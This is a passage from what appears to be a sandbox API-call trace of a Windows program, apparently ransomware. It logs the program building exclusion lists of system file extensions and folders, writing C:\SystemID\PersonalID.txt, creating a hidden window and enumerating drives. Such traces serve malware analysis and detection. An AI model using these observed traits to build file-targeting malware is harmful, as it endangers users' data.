lpWideCharStr="ntuser.dat.LOG1") returned 16 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x340c818 [0226.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643000 | out: hHeap=0x620000) returned 1 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1878 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1878 | out: hHeap=0x620000) returned 1 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81e) returned 0x33dc1b0 [0226.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1039 | out: lpWideCharStr="ntuser.dat.LOG2") returned 16 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x340d040 [0226.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x48) returned 0x33f71e8 [0226.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x814) returned 0x33dc1b0 [0226.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1034 | out: lpWideCharStr="ntuser.pol") returned 11 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3416ec8 [0226.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673d58 [0226.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f71e8 | out: hHeap=0x620000) returned 1 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x33dc1b0 [0226.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1028 | out: lpWideCharStr=".sys") returned 5 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x34176f0 [0226.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e398 [0226.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673d58 | out: hHeap=0x620000) returned 1 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x33dc1b0 [0226.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1028 | out: lpWideCharStr=".ini") returned 5 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3417f08 [0226.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x33dc1b0 [0226.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1028 | out: lpWideCharStr=".DLL") returned 5 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3418720 [0226.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd8) returned 0x708a50 [0226.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e398 | out: hHeap=0x620000) returned 1 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x33dc1b0 [0226.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1028 | out: lpWideCharStr=".dll") returned 5 [0226.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3418f38 [0226.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x33dc1b0 [0226.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1028 | out: lpWideCharStr=".blf") returned 5 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3419750 [0226.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x33dc1b0 [0226.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1028 | out: lpWideCharStr=".bat") returned 5 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3419f68 [0226.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x138) returned 0x6affc0 [0226.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x708a50 | out: hHeap=0x620000) returned 1 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x808) returned 0x33dc1b0 [0226.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1028 | out: lpWideCharStr=".lnk") returned 5 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x341a780 [0226.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x818) returned 0x33dc1b0 [0226.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1036 | out: lpWideCharStr=".regtrans-ms") returned 13 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x341af98 [0226.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x818) returned 0x33dc1b0 [0226.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1036 | out: lpWideCharStr="C:\\SystemID\\") returned 13 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x341b7c0 [0226.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82c) returned 0x33dc1b0 [0226.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33fcd20, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1046 | out: lpWideCharStr="C:\\Users\\Default User\\") returned 23 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x341bfe8 [0226.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c8) returned 0x692888 [0226.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.196] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x33dc1b0 [0226.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33fcd20, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1040 | out: lpWideCharStr="C:\\Users\\Public\\") returned 17 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x341c820 [0226.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x826) returned 0x33dc1b0 [0226.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33fcd20, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1043 | out: lpWideCharStr="C:\\Users\\All Users\\") returned 20 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x341d058 [0226.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x822) returned 0x33dc1b0 [0226.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33fcd20, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1041 | out: lpWideCharStr="C:\\Users\\Default\\") returned 18 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x341d890 [0226.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x834) returned 0x33dc1b0 [0226.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33fcd20, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1050 | out: lpWideCharStr="C:\\Documents and Settings\\") returned 27 [0226.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x341e0c8 [0226.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81e) returned 0x33dc1b0 [0226.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1039 | out: lpWideCharStr="C:\\ProgramData\\") returned 16 [0226.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x341e910 [0226.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x818) returned 0x33dc1b0 [0226.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df70, cbMultiByte=-1, lpWideCharStr=0x33dc1b0, cchWideChar=1036 | out: lpWideCharStr="C:\\Recovery\\") returned 13 [0226.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x341f138 [0226.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33dc1b0 | out: hHeap=0x620000) returned 1 [0226.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2a0) returned 0x68b698 [0226.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x692888 | out: hHeap=0x620000) returned 1 [0226.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1840 [0226.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fcd20 [0226.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fcd20 | out: hHeap=0x620000) returned 1 [0226.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1840 | out: hHeap=0x620000) returned 1 [0226.200] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18dcd8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0226.203] GetLastError () returned 0x3 [0226.203] GetLastError () returned 0x3 [0226.203] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0226.204] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18dcd8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b4 [0226.207] GetFileType (hFile=0x5b4) returned 0x1 [0226.207] GetLastError () returned 0x0 [0226.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x3416ec8 [0226.213] GetLastError () returned 0x0 [0226.226] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0226.255] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0226.256] RegisterClassExW (param_1=0x18df50) returned 0xc11d [0226.256] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x30152 [0226.277] NtdllDefWindowProc_W () returned 0x0 [0226.277] NtdllDefWindowProc_W () returned 0x1 [0226.280] NtdllDefWindowProc_W () returned 0x0 [0226.530] NtdllDefWindowProc_W () returned 0x0 [0226.531] ShowWindow (hWnd=0x30152, nCmdShow=0) returned 0 [0226.531] UpdateWindow (hWnd=0x30152) returned 1 [0226.531] GetLogicalDrives () returned 0x4 [0226.531] SetErrorMode (uMode=0x1) returned 0x0 [0226.531] PathFileExistsA (pszPath="C:\\") returned 1 [0226.531] SetErrorMode (uMode=0x0) returned 0x1 [0226.532] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0226.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x806) returned 0x342c7c8 [0226.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18df08, cbMultiByte=-1, lpWideCharStr=0x342c7c8, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0226.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x342d830 [0226.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x342c7c8 | out: hHeap=0x620000) returned 1 [0226.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x643000 [0226.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x342d830 | out: hHeap=0x620000) returned 1 [0226.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643000 | out: hHeap=0x620000) returned 1 [0226.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x643000 [0226.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33cf790 [0226.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8ec) returned 0x3416ec8 [0226.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x342c7c8 [0226.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x343c4e8 [0226.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1060) returned 0x340bff0 [0226.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x673dc0 [0226.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x342d830 [0226.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x660) returned 0x34177c0 [0226.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x343cd70 [0226.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x343d5f8 [0226.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x343de80 [0226.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x343e708 [0226.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x343ef90 [0226.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x340d058 [0226.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x343f818 [0226.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x34400a0 [0226.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3444cc8 [0226.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3445510 [0226.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3445d78 [0226.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3440928 [0226.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x34411b0 [0226.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x34465e0 [0226.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3446e28 [0226.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3441a38 [0226.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x34422c0 [0226.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3447688 [0226.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3447f10 [0226.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3448798 [0226.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3449020 [0226.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x34498a8 [0226.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x344a130 [0226.661] RtlAllocateHeap (HeapHandle=0x620000, 